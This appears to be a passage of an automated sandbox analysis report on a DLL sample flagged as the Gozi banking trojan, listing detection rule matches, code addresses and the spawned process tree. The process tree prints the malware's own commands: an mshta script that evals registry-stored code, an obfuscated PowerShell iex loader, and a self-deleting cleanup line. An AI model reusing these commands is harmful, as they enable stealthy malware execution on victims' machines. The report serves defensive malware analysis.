Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_050D7596 |
3_2_050D7596 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_050D826C |
3_2_050D826C |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_050D3EEB |
3_2_050D3EEB |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E49870 |
24_2_00E49870 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E42990 |
24_2_00E42990 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E64900 |
24_2_00E64900 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E688EC |
24_2_00E688EC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E53880 |
24_2_00E53880 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4B85C |
24_2_00E4B85C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E621EC |
24_2_00E621EC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5F9DC |
24_2_00E5F9DC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5C148 |
24_2_00E5C148 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4F954 |
24_2_00E4F954 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E69120 |
24_2_00E69120 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5B12C |
24_2_00E5B12C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E412DC |
24_2_00E412DC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E69254 |
24_2_00E69254 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4BA38 |
24_2_00E4BA38 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E59BA8 |
24_2_00E59BA8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E66B84 |
24_2_00E66B84 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E6A38C |
24_2_00E6A38C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E47B90 |
24_2_00E47B90 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E6BB34 |
24_2_00E6BB34 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E6630C |
24_2_00E6630C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E56B08 |
24_2_00E56B08 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E46310 |
24_2_00E46310 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E43CE0 |
24_2_00E43CE0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E6ACF4 |
24_2_00E6ACF4 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E504D0 |
24_2_00E504D0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E46CB8 |
24_2_00E46CB8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E61C90 |
24_2_00E61C90 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5FC40 |
24_2_00E5FC40 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E44438 |
24_2_00E44438 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4DD20 |
24_2_00E4DD20 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E48E70 |
24_2_00E48E70 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E61620 |
24_2_00E61620 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5CE00 |
24_2_00E5CE00 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E437F0 |
24_2_00E437F0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4FF68 |
24_2_00E4FF68 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E4CF74 |
24_2_00E4CF74 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E6BF00 |
24_2_00E6BF00 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E59F0C |
24_2_00E59F0C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00E5271C |
24_2_00E5271C |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7078612.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
